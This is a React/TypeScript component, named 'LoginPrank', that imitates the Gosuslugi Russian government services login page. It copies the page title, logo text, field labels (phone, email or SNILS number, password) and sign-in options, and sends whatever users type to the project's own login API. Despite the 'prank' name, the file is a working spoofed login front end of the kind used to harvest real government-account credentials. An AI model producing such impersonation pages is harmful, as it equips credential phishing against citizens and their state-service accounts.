import React, { useState } from 'react';
import { apiClient } from '../../api/client';
import './LoginPrank.css';

interface LoginProps {
  onLoginSuccess: (token: string) => void;
  onNavigateToRegister?: () => void;
}

const LoginPrank: React.FC<LoginProps> = ({ onLoginSuccess }) => {
  const [username, setUsername] = useState('');
  const [password, setPassword] = useState('');
  const [error, setError] = useState<string | null>(null);
  const [isLoading, setIsLoading] = useState(false);

  React.useEffect(() => {
    document.title = 'Госуслуги';
  }, []);

  const handleSubmit = async (e: React.FormEvent) => {
    e.preventDefault();
    setError(null);
    setIsLoading(true);
    try {
      const response = await apiClient.login(username, password);
      onLoginSuccess(response.access_token);
    } catch (err: any) {
      if (err.response?.data?.detail) {
        setError(err.response.data.detail);
      } else {
        setError('Произошла неизвестная ошибка. Попробуйте снова.');
      }
      setIsLoading(false);
    }
  };

  return (
    <div className="pg-body">
      <div className="pg-layout">

        <div className="pg-card-col">
        <div className="pg-card">
          <div className="pg-card-top">
            <div className="pg-logo">
              <span className="pg-logo-dark"></span><span className="pg-logo-red">госуслуги</span>
            </div>

            <div className="pg-lang">Русский 🇷🇺</div>

            <form onSubmit={handleSubmit}>
              <div className="pg-field">
                <label className="pg-label">Телефон / Эл. почта / СНИЛС</label>
                <div className="pg-input-wrap">
                  <input
                    type="text"
                    className="pg-input"
                    value={username}
                    onChange={e => setUsername(e.target.value)}
                    autoComplete="username"
                    required
                  />
                  <span className="pg-shield">
                    <svg width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.6" strokeLinecap="round" strokeLinejoin="round">
                      <path d="M12 2l7 3.5V11c0 4.4-3.1 8.5-7 9.9C8.1 19.5 5 15.4 5 11V5.5L12 2z"/>
                      <circle cx="12" cy="11" r="2" fill="currentColor" stroke="none"/>
                    </svg>
                  </span>
                </div>
              </div>

              <div className="pg-field">
                <label className="pg-label">Пароль</label>
                <div className="pg-input-wrap">
                  <input
                    type="password"
                    className="pg-input"
                    value={password}
                    onChange={e => setPassword(e.target.value)}
                    autoComplete="current-password"
                    required
                  />
                  <span className="pg-shield">
                    <svg width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.6" strokeLinecap="round" strokeLinejoin="round">
                      <path d="M12 2l7 3.5V11c0 4.4-3.1 8.5-7 9.9C8.1 19.5 5 15.4 5 11V5.5L12 2z"/>
                      <circle cx="12" cy="11" r="2" fill="currentColor" stroke="none"/>
                    </svg>
                  </span>
                </div>
                <a className="pg-restore" href="#">Восстановить</a>
              </div>

              {error && <div className="pg-error">{error}</div>}

              <button type="submit" className="pg-btn-login" disabled={isLoading}>
                {isLoading ? 'Входим...' : 'Войти'}
              </button>
            </form>

            <a className="pg-trouble" href="#">Не удаётся войти?</a>
          </div>

          <div className="pg-alt">
            <div className="pg-alt-label">
              Вход другим способом. <a href="#">Подробнее</a>
            </div>
            <button type="button" className="pg-btn-outline">QR-код</button>
            <button type="button" className="pg-btn-outline">Электронная подпись</button>
          </div>
        </div>
        <a className="pg-register" href="#">Зарегистрироваться</a>
        </div>

        <div className="pg-hint">
          <div className="pg-hint-icon">
            <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="#2552e4" strokeWidth="1.7" strokeLinecap="round" strokeLinejoin="round">
              <path d="M9 18h6M10 21h4M12 2a7 7 0 0 1 5 11.9l-.5.6c-.5.7-.5 1-.5 1.5H8c0-.5 0-.8-.5-1.5L7 13.9A7 7 0 0 1 12 2z"/>
            </svg>
          </div>
          <p>Куда ещё нельзя войти с паролем от Госуслуг?</p>
        </div>

      </div>
    </div>
  );
};

export default LoginPrank;
